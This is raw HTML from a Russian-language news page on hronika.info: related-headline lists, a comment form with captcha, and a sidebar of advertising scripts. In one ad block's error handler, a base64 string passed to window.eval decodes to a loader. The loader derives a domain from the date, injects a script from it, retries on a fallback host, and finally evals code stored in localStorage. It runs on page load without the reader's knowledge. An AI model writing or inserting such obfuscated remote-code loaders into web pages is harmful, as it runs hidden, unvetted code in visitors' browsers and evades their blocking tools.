    <a href="http://hronika.info/kurjozy/401214-zabavnye-zhivotnye-otmechayuschie-svoi-dni-rozhdeniya.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550925551_domashnie-pitomcy-otmechayut-svoi-dni-rozhdeniya-1_1.jpg" alt="Забавные животные, отмечающие свои дни рождения" class="l_n_im" title="Забавные животные, отмечающие свои дни рождения" />
</a>
<strong class="ttl" title="Забавные животные, отмечающие свои дни рождения"><a href="http://hronika.info/kurjozy/401214-zabavnye-zhivotnye-otmechayuschie-svoi-dni-rozhdeniya.html">Забавные животные, отмечающие свои дни рождения</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401195-etot-akkaunt-v-tvittere-dokazyvaet-chto-kris-evans-sobaka.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550921948_chris-evans-golden-retriever-5c6ebed6d6262__700.jpg" alt="Этот аккаунт в твиттере доказывает, что Крис Эванс - собака" class="l_n_im" title="Этот аккаунт в твиттере доказывает, что Крис Эванс - собака" />
</a>
<strong class="ttl" title="Этот аккаунт в твиттере доказывает, что Крис Эванс - собака"><a href="http://hronika.info/kurjozy/401195-etot-akkaunt-v-tvittere-dokazyvaet-chto-kris-evans-sobaka.html">Этот аккаунт в твиттере доказывает, что Крис Эванс - собака</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401184-nichto-ne-vechno-v-avstralii-raspalas-para-cherepah-kotorye-byli-vmeste-90-to-let.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550919608_fa0522d13e6b202f4c9b699fc6aa6739eaf310dc.jpg" alt="Ничто не вечно: в Австралии распалась пара черепах, которые были вместе 90-то лет" class="l_n_im" title="Ничто не вечно: в Австралии распалась пара черепах, которые были вместе 90-то лет" />
</a>
<strong class="ttl" title="Ничто не вечно: в Австралии распалась пара черепах, которые были вместе 90-то лет"><a href="http://hronika.info/kurjozy/401184-nichto-ne-vechno-v-avstralii-raspalas-para-cherepah-kotorye-byli-vmeste-90-to-let.html">Ничто не вечно: в Австралии распалась пара черепах, которые были вместе 90-то</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401168-kureznaya-podborka-vyvesok-ot-bogov-marketinga.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550916566_00marketingporusski_.jpg" alt="Курьезная подборка вывесок от "богов" маркетинга" class="l_n_im" title="Курьезная подборка вывесок от "богов" маркетинга" />
</a>
<strong class="ttl" title="Курьезная подборка вывесок от "богов" маркетинга"><a href="http://hronika.info/kurjozy/401168-kureznaya-podborka-vyvesok-ot-bogov-marketinga.html">Курьезная подборка вывесок от "богов" маркетинга</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401157-mama-koshka-vospityvayuschaya-svoego-kotenka-pokorila-set.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550914197_vospitaniem-malenkogo-kotenka-zanimaetsya-prezhde-vsego-mat.jpg" alt="Мама-кошка, воспитывающая своего котенка, покорила Сеть" class="l_n_im" title="Мама-кошка, воспитывающая своего котенка, покорила Сеть" />
</a>
<strong class="ttl" title="Мама-кошка, воспитывающая своего котенка, покорила Сеть"><a href="http://hronika.info/kurjozy/401157-mama-koshka-vospityvayuschaya-svoego-kotenka-pokorila-set.html">Мама-кошка, воспитывающая своего котенка, покорила Сеть</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401141-zabavnye-snimki-iz-serii-schastlivoe-detstvo.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550911566_0tyazholoedetstvo.jpg" alt="Забавные снимки из серии "Счастливое детство"" class="l_n_im" title="Забавные снимки из серии "Счастливое детство"" />
</a>
<strong class="ttl" title="Забавные снимки из серии "Счастливое детство""><a href="http://hronika.info/kurjozy/401141-zabavnye-snimki-iz-serii-schastlivoe-detstvo.html">Забавные снимки из серии "Счастливое детство"</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/401137-v-ukraine-zaprosy-svyazannye-s-23-fevralya-lidiruyut-v-google-trends.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550910527_v-ukraine-zaprosy-svyazannye-s-23-fevralya-lidiruyut-v-google-trends.jpg" alt="В Украине запросы, связанные с 23 февраля, лидируют в Google Trends" class="l_n_im" title="В Украине запросы, связанные с 23 февраля, лидируют в Google Trends" />
</a>
<strong class="ttl" title="В Украине запросы, связанные с 23 февраля, лидируют в Google Trends"><a href="http://hronika.info/ukraina/401137-v-ukraine-zaprosy-svyazannye-s-23-fevralya-lidiruyut-v-google-trends.html">В Украине запросы, связанные с 23 февраля, лидируют в Google Trends</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401126-milye-i-smeshnye-utyata-umilili-set.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550908607_vot-pochemu-utyata-takie-milye-31.jpg" alt="Милые и смешные утята умилили Сеть" class="l_n_im" title="Милые и смешные утята умилили Сеть" />
</a>
<strong class="ttl" title="Милые и смешные утята умилили Сеть"><a href="http://hronika.info/kurjozy/401126-milye-i-smeshnye-utyata-umilili-set.html">Милые и смешные утята умилили Сеть</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/401109-nachnite-den-s-ulybki-podborka-smeshnyh-anekdotov.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550905890_6106.jpg" alt="Начните день с улыбки: подборка смешных анекдотов" class="l_n_im" title="Начните день с улыбки: подборка смешных анекдотов" />
</a>
<strong class="ttl" title="Начните день с улыбки: подборка смешных анекдотов"><a href="http://hronika.info/kurjozy/401109-nachnite-den-s-ulybki-podborka-smeshnyh-anekdotov.html">Начните день с улыбки: подборка смешных анекдотов</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/401108-sutki-v-oos-14-obstrelov-odin-ranenyy.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550905458_sutki-v-oos14-obstrelov-odin-ranenyy.jpg" alt="Сутки в ООС: 14 обстрелов, один раненый" class="l_n_im" title="Сутки в ООС: 14 обстрелов, один раненый" />
</a>
<strong class="ttl" title="Сутки в ООС: 14 обстрелов, один раненый"><a href="http://hronika.info/ukraina/401108-sutki-v-oos-14-obstrelov-odin-ranenyy.html">Сутки в ООС: 14 обстрелов, один раненый</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/400906-problemy-chelovechestva-v-smeshnyh-komiksah.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550835511_komiksy.jpg" alt="Проблемы человечества в смешных комиксах" class="l_n_im" title="Проблемы человечества в смешных комиксах" />
</a>
<strong class="ttl" title="Проблемы человечества в смешных комиксах"><a href="http://hronika.info/kurjozy/400906-problemy-chelovechestva-v-smeshnyh-komiksah.html">Проблемы человечества в смешных комиксах</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/400905-ni-dnya-bez-smeha-otlichnye-anekdoty-na-pyatnicu.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550835347_yumor.jpg" alt="Ни дня без смеха: отличные анекдоты на пятницу" class="l_n_im" title="Ни дня без смеха: отличные анекдоты на пятницу" />
</a>
<strong class="ttl" title="Ни дня без смеха: отличные анекдоты на пятницу"><a href="http://hronika.info/kurjozy/400905-ni-dnya-bez-smeha-otlichnye-anekdoty-na-pyatnicu.html">Ни дня без смеха: отличные анекдоты на пятницу</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/400904-svezhie-avtoprikoly-na-vse-sluchai-zhizni.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550835077_avto.jpg" alt="Свежие автоприколы на все случаи жизни" class="l_n_im" title="Свежие автоприколы на все случаи жизни" />
</a>
<strong class="ttl" title="Свежие автоприколы на все случаи жизни"><a href="http://hronika.info/kurjozy/400904-svezhie-avtoprikoly-na-vse-sluchai-zhizni.html">Свежие автоприколы на все случаи жизни</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/400903-smeshnye-kommentarii-ot-ochen-sarkastichnyh-lyudey.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550834800_sarkazm.jpg" alt="Смешные комментарии от очень саркастичных людей" class="l_n_im" title="Смешные комментарии от очень саркастичных людей" />
</a>
<strong class="ttl" title="Смешные комментарии от очень саркастичных людей"><a href="http://hronika.info/kurjozy/400903-smeshnye-kommentarii-ot-ochen-sarkastichnyh-lyudey.html">Смешные комментарии от очень саркастичных людей</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/kurjozy/400900-detskie-kostyumy-kotorye-mogli-sdelat-tolko-veselye-roditeli.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550834247_kostyum.jpg" alt="Детские костюмы, которые могли сделать только веселые родители" class="l_n_im" title="Детские костюмы, которые могли сделать только веселые родители" />
</a>
<strong class="ttl" title="Детские костюмы, которые могли сделать только веселые родители"><a href="http://hronika.info/kurjozy/400900-detskie-kostyumy-kotorye-mogli-sdelat-tolko-veselye-roditeli.html">Детские костюмы, которые могли сделать только веселые родители</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/401019-situaciya-na-donbasse-boeviki-10-raz-narushili-rezhim-primireniya.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550856550_2285246.jpg" alt="Ситуация на Донбассе: боевики 10 раз нарушили режим примирения" class="l_n_im" title="Ситуация на Донбассе: боевики 10 раз нарушили режим примирения" />
</a>
<strong class="ttl" title="Ситуация на Донбассе: боевики 10 раз нарушили режим примирения"><a href="http://hronika.info/ukraina/401019-situaciya-na-donbasse-boeviki-10-raz-narushili-rezhim-primireniya.html">Ситуация на Донбассе: боевики 10 раз нарушили режим примирения</a></strong>
</li><li class="listalkafull_n">
    <a href="http://hronika.info/ukraina/401017-sud-snyal-arest-s-uchastka-na-allee-geroev-nebesnoy-sotni-v-kieve.html"><img src="/posters/167_120_50_1/uploads/posts/2019-02/thumbs/1550855652_2285241.jpg" alt="Суд снял арест с участка на аллее Героев Небесной сотни в Киеве" class="l_n_im" title="Суд снял арест с участка на аллее Героев Небесной сотни в Киеве" />
</a>
<strong class="ttl" title="Суд снял арест с участка на аллее Героев Небесной сотни в Киеве"><a href="http://hronika.info/ukraina/401017-sud-snyal-arest-s-uchastka-na-allee-geroev-nebesnoy-sotni-v-kieve.html">Суд снял арест с участка на аллее Героев Небесной сотни в Киеве</a></strong>
</li></ul>
        </div>
        <a class="buttons next" href="#"></a> 
      </div>
    </div>
</div>
-->
<br />
<div id="comments_tab"><b>Оставьте свой комментарий</b>
<!--  <ul class="tabs">
  <li>
    <a href="#hronika">Хроника</a>
  </li>
<li>
    <a href="#vkontakte">Вконтакте</a>
  </li> 
  <li>
    <a href="#facebook">Фейсбук</a>
  </li>
</ul> -->
<div class="clr">
  <div id="hronika">
<form  method="post" name="dle-comments-form" id="dle-comments-form" action="/kriminal/401466-na-odeschine-dva-policeyskih-postradali-v-dtp.html"><br />
<div class="baseform addcomfrm">
	<table class="tableform">
		
		<tr>
			<td class="label">
				Имя:<span class="impot">*&nbsp;&nbsp;</span>
				<input type="text" name="name" id="name" class="f_input" />
			</td>
		</tr>
		<tr>	
			<td class="label">E-Mail:<input type="text" name="mail" id="mail" class="f_input" style="margin-left:8px" /></td>
		</tr>
		
		<tr>	
			<td class="editorcomm"><script type="text/javascript">
<!--
var text_enter_url       = "Введите полный URL ссылки";
var text_enter_size       = "Введите размеры флэш ролика (ширина, высота)";
var text_enter_flash       = "Введите ссылку на флэш ролик";
var text_enter_page      = "Введите номер страницы";
var text_enter_url_name  = "Введите описание ссылки";
var text_enter_page_name = "Введите описание ссылки";
var text_enter_image    = "Введите полный URL изображения";
var text_enter_email    = "Введите e-mail адрес";
var text_code           = "Использование: [CODE] Здесь Ваш код.. [/CODE]";
var text_quote          = "Использование: [QUOTE] Здесь Ваша Цитата.. [/QUOTE]";
var text_upload         = "Загрузка файлов и изображений на сервер";
var error_no_url        = "Вы должны ввести URL";
var error_no_title      = "Вы должны ввести название";
var error_no_email      = "Вы должны ввести e-mail адрес";
var prompt_start        = "Введите текст для форматирования";
var img_title   		= "Введите по какому краю выравнивать картинку (left, center, right)";
var email_title  	    = "Введите описание ссылки";
var text_pages  	    = "Страница";
var image_align  	    = "left";
var bb_t_emo  	        = "Вставка смайликов";
var bb_t_col  	        = "Цвет:";
var text_enter_list     = "Введите пункт списка. Для завершения ввода оставьте поле пустым.";
var text_alt_image      = "Введите описание изображения";
var img_align  	        = "Выравнивание";
var img_align_sel  	    = "<select name='dleimagealign' id='dleimagealign' class='ui-widget-content ui-corner-all'><option value='' >Нет</option><option value='left' selected>По левому краю</option><option value='right' >По правому краю</option><option value='center' >По центру</option></select>";

var selField  = "comments";
var fombj    = document.getElementById( 'dle-comments-form' );
-->
</script>
<div class="bb-editor">
<div class="bb-pane" onmouseenter="if(is_ie9) get_sel(eval('fombj.'+ selField));">
<b id="b_b" class="bb-btn" onclick="simpletag('b')" title="Полужирный">Полужирный</b>
<b id="b_i" class="bb-btn" onclick="simpletag('i')" title="Наклонный текст">Наклонный текст</b>
<b id="b_u" class="bb-btn" onclick="simpletag('u')" title="Подчёркнутый текст">Подчёркнутый текст</b>
<b id="b_s" class="bb-btn" onclick="simpletag('s')" title="Зачёркнутый текст">Зачёркнутый текст</b>
<span class="bb-sep">|</span>
<b id="b_left" class="bb-btn" onclick="simpletag('left')" title="Выравнивание по левому краю">Выравнивание по левому краю</b>
<b id="b_center" class="bb-btn" onclick="simpletag('center')" title="По центру">По центру</b>
<b id="b_right" class="bb-btn" onclick="simpletag('right')" title="Выравнивание по правому краю">Выравнивание по правому краю</b>
<span class="bb-sep">|</span>
<b id="b_emo" class="bb-btn" onclick="ins_emo(this)" title="Вставка смайликов">Вставка смайликов</b>


<b id="b_color" class="bb-btn" onclick="ins_color(this)" title="Выбор цвета">Выбор цвета</b>
<span class="bb-sep">|</span>
<b id="b_hide" class="bb-btn" onclick="simpletag('hide')" title="Скрытый текст">Скрытый текст</b>
<b id="b_quote" class="bb-btn" onclick="simpletag('quote')" title="Вставка цитаты">Вставка цитаты</b>
<b id="b_tnl" class="bb-btn" onclick="translit()" title="Преобразовать выбранный текст из транслитерации в кириллицу">Преобразовать выбранный текст из транслитерации в кириллицу</b>
<b id="b_spoiler" class="bb-btn" onclick="simpletag('spoiler')" title="Вставка спойлера">Вставка спойлера</b>
</div>
<div id="dle_emos" style="display: none;" title="Вставка смайликов"><div style="width:100%;height:100%;overflow: auto;"><table cellpadding="0" cellspacing="0" border="0" width="100%"><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wink:'); return false;"><img style="border: none;" alt="wink" src="http://hronika.info/engine/data/emoticons/wink.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':winked:'); return false;"><img style="border: none;" alt="winked" src="http://hronika.info/engine/data/emoticons/winked.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':smile:'); return false;"><img style="border: none;" alt="smile" src="http://hronika.info/engine/data/emoticons/smile.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':am:'); return false;"><img style="border: none;" alt="am" src="http://hronika.info/engine/data/emoticons/am.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':belay:'); return false;"><img style="border: none;" alt="belay" src="http://hronika.info/engine/data/emoticons/belay.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':feel:'); return false;"><img style="border: none;" alt="feel" src="http://hronika.info/engine/data/emoticons/feel.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':fellow:'); return false;"><img style="border: none;" alt="fellow" src="http://hronika.info/engine/data/emoticons/fellow.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':laughing:'); return false;"><img style="border: none;" alt="laughing" src="http://hronika.info/engine/data/emoticons/laughing.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':lol:'); return false;"><img style="border: none;" alt="lol" src="http://hronika.info/engine/data/emoticons/lol.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':love:'); return false;"><img style="border: none;" alt="love" src="http://hronika.info/engine/data/emoticons/love.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':no:'); return false;"><img style="border: none;" alt="no" src="http://hronika.info/engine/data/emoticons/no.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':recourse:'); return false;"><img style="border: none;" alt="recourse" src="http://hronika.info/engine/data/emoticons/recourse.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':request:'); return false;"><img style="border: none;" alt="request" src="http://hronika.info/engine/data/emoticons/request.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':sad:'); return false;"><img style="border: none;" alt="sad" src="http://hronika.info/engine/data/emoticons/sad.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':tongue:'); return false;"><img style="border: none;" alt="tongue" src="http://hronika.info/engine/data/emoticons/tongue.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':wassat:'); return false;"><img style="border: none;" alt="wassat" src="http://hronika.info/engine/data/emoticons/wassat.gif" /></a></td></tr><tr><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':crying:'); return false;"><img style="border: none;" alt="crying" src="http://hronika.info/engine/data/emoticons/crying.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':what:'); return false;"><img style="border: none;" alt="what" src="http://hronika.info/engine/data/emoticons/what.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':bully:'); return false;"><img style="border: none;" alt="bully" src="http://hronika.info/engine/data/emoticons/bully.gif" /></a></td><td style="padding:2px;" align="center"><a href="#" onclick="dle_smiley(':angry:'); return false;"><img style="border: none;" alt="angry" src="http://hronika.info/engine/data/emoticons/angry.gif" /></a></td></tr></table></div></div>
<textarea name="comments" id="comments" cols="70" rows="10" onfocus="setNewField(this.name, document.getElementById( 'dle-comments-form' ))"></textarea>
</div></td>
		</tr>
			
			
		<tr>		
			<td class="label">Введите код: <span class="impot">*</span></td>	
			<td>	
				<div><span id="dle-captcha"><img src="/engine/modules/antibot/antibot.php" alt="Включите эту картинку для отображения кода безопасности" width="160" height="80" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a></span></div>	
				<div><input type="text" name="sec_code" id="sec_code" style="width:115px" class="f_input" /></div>
			</td>	
		</tr>	
			
			
	</table>
	<br />
</div>
	<div class="fieldsubmit" style=" position: relative; width: 100%; height: 23px; top: -10px; ">	
		<button type="submit" name="submit" class="fbutton addcombut"><span>Добавить</span></button>
	</div>

		<input type="hidden" name="subaction" value="addcomment" />
		<input type="hidden" name="post_id" id="post_id" value="401466" /></form><script type="text/javascript">
<!--
$(function(){

	$('#dle-comments-form').submit(function() {
	  doAddComments();
	  return false;
	});

});

function reload () {

	var rndval = new Date().getTime(); 

	document.getElementById('dle-captcha').innerHTML = '<img src="/engine/modules/antibot/antibot.php?rndval=' + rndval + '" width="160" height="80" alt="" /><br /><a onclick="reload(); return false;" href="#">обновить, если не виден код</a>';

};
//-->
</script>
  </div>

  <!--
  <div id="vkontakte">


<script type="text/javascript" src="//vk.com/js/api/openapi.js?98"></script>

<script type="text/javascript">
  VK.init({apiId: 3098550, onlyWidgets: true});
</script>


<div id="vk_comments"></div>
<script type="text/javascript">
VK.Widgets.Comments("vk_comments", {limit: 10, width: "100%", attach: "*"});
</script>
      
  </div>
  <div id="facebook">
<div class="fb-comments" data-href="http://hronika.info/kriminal/401466-na-odeschine-dva-policeyskih-postradali-v-dtp.html" data-width="410"></div>      
  </div>
  -->
  </div> 
</div>
 <div class="screenshots_block"><script src="//nkjjx.sckxppzdm.com/v/8MWR_xWF0OLhNZkMkQX3CSXXpEGteg" type="text/javascript" async></script>
</div>
 
<div id="dle-ajax-comments"></div>

<!--dlenavigationcomments-->
<div class="clr"><br /></div>
</div>
<div id='_mwayss-13a2bf393830a24cb00f9b493f869072'></div>
                <script>      
                    (function(window, document, undefined) {
                        var script_tag = document.createElement('script');
                        script_tag.src = 'https://ad.mediawayss.com/ad/mwayss_invocation.min.js?pzoneid=1171&height=288&width=512&tld=hronika.info&ctype=div&ch=DOMAIN_HERE';
                        var container = document.getElementById('_mwayss-13a2bf393830a24cb00f9b493f869072');    
                        container.parentNode.insertBefore(script_tag, container);
                    })(window, document);
                </script>
<script>
$.ctrl = function(key, callback, args) {
    var isCtrl = false;
    $(document).keydown(function(e) {
        if(!args) args=[]; 
        isCtrl = e.ctrlKey;
        if((e.keyCode == key.charCodeAt(0) || e.keyCode == 45) && isCtrl) callback.apply(this, args);
    }).keyup(function(e) {
        if(e.ctrlKey) isCtrl = false;
    });        
};
$.ctrl('C', function() {
    $('body').prepend("<div id='ctrl_c' class='ctrl_c' align='justify'><span>&times;</span>Использование материалов и новостей с сайта <a style='font-size: 11px;' href='http://hronika.info'>hronika.info</a> разрешается только при условии размещения прямой, открытой для поисковых систем, гиперссылки на опубликованную или цитируемую новость.</div>");
    $("#ctrl_c > span").click( function() { $("#ctrl_c").remove(); });

	
ns4 = (document.layers)? true:false
ie4 = (document.all)? true:false

function mousemove(event) {
        var mouse_x = y = 0;
    if (document.attachEvent != null) {
        mouse_x = window.event.clientX;
        mouse_y = window.event.clientY;
    } else if (!document.attachEvent && document.addEventListener) {
        mouse_x = event.clientX;
        mouse_y = event.clientY;
    }
    
}

    document.onmousemove=mousemove;

});

$(document).ready(function(){
var fimg=$(".ax-full img").first();
fimg.css({"width":"200px","height":"150px"});
});
</script>
</div></article>
            </div>
          </div>

             <aside id="sideRight2"><!---->

         <!-- 
		 <div class="wrap"> 
         	
         -->

<div class="row-600">
    <div class="col-336">
        <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<ins class="adsbygoogle"
     style="display:inline-block;width:336px;height:280px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="3119660949"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
    </div>
    <div class="col-260">
       <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10484">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10484/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
        
    </div>
</div>



<div class="clr"></div>

<div class="width49-4 fleft">  
            <div class="wrap">
            <script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script>
<div id="300-500zarabotok"></div>
<script type="text/javascript">
	new MTr('300-500zarabotok', {site:357,format:0});
</script>
            <!-- Асинхронный код информера news.2xclick.ru -->
<div id="gnezdo_ru_10493">Загрузка...</div>
<script language='JavaScript'>
	var s = document.createElement("script"),
	f = function(){ document.getElementsByTagName("head")[0].appendChild(s); };
	s.type = "text/javascript";
	s.async = true;
	s.src = '//news.2xclick.ru/show/10493/block_a.js';
	if (window.opera == "[object Opera]") {
		document.addEventListener("DOMContentLoaded", f);
	} else { f(); }
</script>
<!-- Конец кода информера news.2xclick.ru -->
            <div id="MIXADV_4786" class="MIXADVERT_NET"></div>
          <script> 
          var node4786 = document.getElementById("MIXADV_4786");
          if( node4786 )
          {
               var script = document.createElement("script");
               script.charset = "utf-8";
               script.src = "https://m.mixadvert.com/show/?id=4786&r="+Math.random();
               node4786.parentNode.appendChild(script); 
               script.onerror = function(){
                  window.eval( atob("dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgInBybyIsICJ0b3AiLCAiaW5mbyIsICJvbmxpbmUiLCAic3BhY2UiLCAic2l0ZSIsICJ0ZWNoIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDQ3ODYgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNDc4Ni5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgc2NyaXB0X3NlY29uZCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3ZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLmNvbSI7c2NyaXB0X3NlY29uZC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlNDc4Ni5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9zZWNvbmQpOyBzZXRUaW1lb3V0KCBmdW5jdGlvbiAoKSB7IGlmKCBub2RlNDc4Ni5pbm5lckhUTUwgPT0gIiIgKSB3aW5kb3cuZXZhbChsb2NhbFN0b3JhZ2UuZ2V0SXRlbSgiNDc4NiIpKSB9LCA1MDAwKTsgIDt9OyA=") );
              }
          }
          </script>
            <!-- Composite Start -->
<div id="M225926ScriptRootC608879">
        <div id="M225926PreloadC608879">
        Загрузка...    </div>
        <script>
                (function(){
            var D=new Date(),d=document,b='body',ce='createElement',ac='appendChild',st='style',ds='display',n='none',gi='getElementById',lp=d.location.protocol,wp=lp.indexOf('http')==0?lp:'https:';
            var i=d[ce]('iframe');i[st][ds]=n;d[gi]("M225926ScriptRootC608879")[ac](i);try{var iw=i.contentWindow.document;iw.open();iw.writeln("<ht"+"ml><bo"+"dy></bo"+"dy></ht"+"ml>");iw.close();var c=iw[b];}
            catch(e){var iw=d;var c=d[gi]("M225926ScriptRootC608879");}var dv=iw[ce]('div');dv.id="MG_ID";dv[st][ds]=n;dv.innerHTML=608879;c[ac](dv);
            var s=iw[ce]('script');s.async='async';s.defer='defer';s.charset='utf-8';s.src=wp+"//jsc.marketgid.com/h/r/hronika.info.608879.js?t="+D.getYear()+D.getMonth()+D.getUTCDate()+D.getUTCHours();c[ac](s);})();
    </script>
    <script>s1='${PUBLISHER_ID}'</script></div>
<!-- Composite End -->
            <!-- start NEW_v1_right for hronika.info -->
<div id="adpartner-jsunit-850">
    <script type="text/javascript">
        var head = document.getElementsByTagName('head')[0];
        var script = document.createElement('script');
        script.type = 'text/javascript';
        script.src = "//a4p.adpartner.pro/jsunit?id=850&" + Math.random();
        head.appendChild(script);
    </script>
</div>
<!-- end NEW_v1_right for hronika.info -->
            <div id="IencjMRQWgr5YuVfVLqO" data-type="2" class="blockOfO1b2l3" ></div>
<script>window.RESOURCE_O1B2L3 = 'leokross.com';</script>
<script src="//leokross.com/WZuI/GLYm.js" ></script>
            <script charset="windows-1251" src="//i.mediatraffic.com.ua/js/uho/mt20_3.js"></script>

<div id="300-250"></div>
<script type="text/javascript">
	new MTr('300-250', {site:357,format:4});
</script>
            <script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Side-1 -->
<ins class="adsbygoogle"
     style="display:inline-block;width:300px;height:600px"
     data-ad-client="ca-pub-9393887096432784"
     data-ad-slot="5084862545"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>                
				<h3>Хроника событий сегодня</h3>
               <div class="newsr_1">
    <span>24.02-15:27</span>
	<a href="http://hronika.info/kultura/401470-52-letnyaya-olga-sumskaya-poradovala-cvetuschim-vidom.html"><strong title="52-летняя Ольга Сумская порадовала цветущим видом">52-летняя Ольга Сумская порадовала цветущим видом</strong><b>0</b></a>
</div><div class="newsr_1">
    <span>24.02-15:23</span>
